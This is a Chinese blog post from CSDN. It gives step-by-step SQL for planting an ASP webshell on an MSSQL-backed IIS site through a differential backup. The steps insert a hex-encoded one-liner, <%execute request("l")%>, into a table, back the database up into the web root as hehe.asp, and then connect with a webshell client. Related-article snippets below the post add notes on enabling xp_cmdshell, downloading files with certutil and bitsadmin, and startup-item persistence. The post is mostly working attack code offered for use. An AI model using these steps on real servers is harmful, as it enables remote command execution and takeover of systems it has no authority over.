mssql差异备份拿shell

最新推荐文章于 2021-02-08 08:18:02 发布
最新推荐文章于 2021-02-08 08:18:02 发布
阅读量5.3k 收藏 1
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/50829977
版权

(1)首先:

declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s;

注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换

这里的数据库名字是:Newport 转换后就是:4e6577706f7274


(2)

create table [dbo].[hack520] ([cmd] [image]);

注意:这个是创建一个表

(3)

insert into hack520(cmd) values(0x3C2565786563757465207265717565737428226C2229253E);

这个在数据库中插入一句话木马:其中:0x3C2565786563757465207265717565737428226C2229253E 是木马内容的十六进制数字,也用hackbar 进行转换

这里的一句话的内容是:<%execute request("l")%> 转换之后:3C2565786563757465207265717565737428226C2229253E

(4)

declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433a5c696e65747075625c777777726f6f745c686568652e617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT

这个是将带木马的文件备份到网站路径底下:其中:433a5c696e65747075625c777777726f6f745c686568652e617370是一句话木马的绝对路径的十六进制的数字,同样的也用hackbar进行转换

这里的一句话的绝对路径是:C:\inetpub\wwwroot\hehe.asp 转换之后:433a5c696e65747075625c777777726f6f745c686568652e617370


到这里,整个过程就结束了,用菜刀访问一下:




niexinming
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSSQL差异备份取系统权限
Quantum Intelligence
08-26 1527
 MSSQL差异备份取系统权限TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的!既然如此就拿出来大家分享吧!MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码让系统执行了之后自动提升权限 或者添加管理员吗? 答案当然可以了,kj021320测试了N次之后跟你说!那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是
mssql 日志备份getshell
qq_82303224_的博客
04-24 300
第二个disk = 写入webshell的网站物理地址。(根目录写不进去可以考虑网站上传目录)二:差异备份:(数据库很小时使用,大了会不成功)bitsadmin 下载文件并写入系统启动项。如果有waf的话可以考虑换个一句话写入。第一个disk = 有权限写入的目录。开启 xp_cmdshell。certutil 下载文件。
SQL log备份上WEBSHELL总结
HackCode的专栏
07-26 497
 当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对DB权限的第一种试探方法.但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题,我在这里做个总结,也好让我们对不能闭合的方法有一个全面的了解.1.先介绍下LO
MSsql差异备份总结
weixin_30733003的博客
04-27 220
.完整备份一次(保存位置当然可以改)backup database 库名 to disk = 'c:\ddd.bak';--2.创建表并插曲入数据create table [dbo].[dtest] ([cmd] [image]);insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);...
Mssqlsqlserver)差异备份getshell思路笔记
来到了学渣的博客
04-05 1701
差异备份的概念(百度百科): 备份自上一次完全备份之后有变化的数据。差异备份过程中,只备份有标记的那些选中的文件和文件夹。它不清除标记,也即备份后不标记为已备份文件。换言之,不清除存档属性。 差异备份getshell条件: 目标站是否存在mssql数据库注入漏洞 目标站的用户是否具备sa权限、dbo权限 找到网站的物理路径 大概思路: 假设:http://xxxxx/show.aspx?c...
mysql备份shell脚本
06-10
mysql备份支持全量、日志备份
shell写一个mysql数据备份脚本
09-09
此外,还可以考虑使用更高效的备份方法,如增量备份差异备份。 总结来说,通过编写shell脚本配合`mysqldump`和`crontab`,可以实现MySQL数据库的自动备份与清理,以确保数据安全并有效管理存储资源。在实际操作中...
数据库备份Shell脚本.zip
08-29
本文将详细介绍基于Xtrabackup的MySQL数据库备份Shell脚本及其相关知识点。 1. **Xtrabackup介绍**: Xtrabackup是由Percona公司开发的开源备份工具,支持InnoDB和XtraDB存储引擎的全量和增量备份。它能够实现在线...
xtrabackup备份恢复shell脚本
08-26
使用Xtrabackup进行全库、累计和差异备份,通常涉及以下步骤: 1. **全量备份**:首次备份时,执行`xtrabackup --backup`命令,获取数据库的完全状态。 2. **增量备份**:之后,使用`--incremental-basedir`参数...
mysql数据库自动定时备份
04-16
全备备份是指完全复制数据库的所有内容,而增量/差异备份只记录自上次全备或增量备份以来发生的变化,这样可以节省存储空间。 实现自动定时备份,你可以使用MySQL的内置工具`mysqldump`。这个命令行实用程序能够...
南方数据企业网站管理系统源码包-存有sql注入漏洞与数据库备份getshell漏洞.zip
01-05
南方数据企业网站管理系统-存有sql注入漏洞与数据库备份getshell漏洞,如有侵权,请联系CSDN管理员删除即可
MSSQL差异备份取系统权限的相关软件下载
12-15
昨天在网上找资料的时间无意进了一个站,糊里糊涂就进去了,想提权提不起来,后来加上服务商的Q号想社工一下,射了半天得知服务器的安全是绿盟的人给做的 安全,后来就问猪猪有什么提权的方法没,他刚好做了这个动画就给发来过来,在网上查了一下找到了文章,一起拷贝过来.最近忙着学习很少关注这方面的东西, 落后了,落后了…… 下面是是在网上找到的资料和动画.   TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的!既然如此就拿出来大家分享吧! MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码 让系统执行了之后自动提升权限 或者添加管理员吗? 答
Linux入门之——MySQL的的备份与恢复
qq_42452450的博客
09-17 281
MySQL的的备份与恢复
mysql 差异备份_mssql数据库差异备份方法
weixin_39949473的博客
01-27 348
手工实现差异备份的步骤字符型:1、恢复当前库;alter database 当前库 set recovery full--2、建表cmd;create table cmd (a image)--3、备份当前库到d:cmd1;backup log 当前库 to disk = 'd:cmd1' with init--4、插入一句话代码到创建的表cmd;insert into cmd (a) value...
mysql差异备份
weixin_44435237的博客
02-22 1700
mysql差异备份 开启mysql服务器的二进制日志功能 [root@jun ~]# vim /etc/my.cnf [root@jun ~]# service mysqld restart Shutting down MySQL.. SUCCESS! Starting MySQL. SUCCESS! [root@jun ~]# tail -15 /etc/my.cnf [mysqld] ...
SQLServer数据库差异备份
weixin_30344795的博客
08-11 914
差异备份 (differential backup)定义 一种数据备份,基于完整数据库或部分数据库或一组数据文件或文件组(差异基准)的最新完整备份,并且仅包含自确定差异基准以来发生更改的数据。 使用SSMS数据库管理工具进行数据库差异备份 1、选择数据库-》右键点击-》选择任务-》选择备份。 2、在备份数据库弹出框中-》选择备份类型为差异-》然后删除系统生成的目标文件-》然后点击添加。...
Sql server 2008 的完成备份差异备份
weixin_34278190的博客
01-23 333
当数据库数据量不大的情况下用 Sqlserver 的完全备份就完全可以了 步骤为: 1、在需要还原的数据库上右键选择如图 2、在“常规”选项中点击“源设备”选取磁盘上备份好的.bak文件后,勾上“还原”选项的勾 3、在“选项”页面中,勾选上“覆盖现有数据库”,恢复状态,选择第一个“回滚未提交的事务。。。。”,其中在“行数据”和“日志”两个数据行中,务必查看“还原为”的路径是否指...
mysql差异备份提权_提权思路之MSSQL差异备份取系统权限
weixin_36435766的博客
02-08 51
MSSQL差异备份获取webshell几乎人人皆知,那么我们可以利用差异备份出来的文件当作恶意代码让系统执行了之后自动提升权限或者添加管理员吗?答案当然可以了,kj021320测试了N次之后跟你说!那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是废话吧!大家不用想都知道通用地方C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启...
mysql增量备份shell脚本
最新发布
11-29
以下是一个MySQL增量备份Shell脚本示例,可以根据实际情况进行修改: ```shell #!/bin/bash # MySQL增量备份脚本 # 备份目录 backup_dir=/opt/mysqlbackup/inc # MySQL用户名 mysql_user=root # MySQL密码 mysql_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值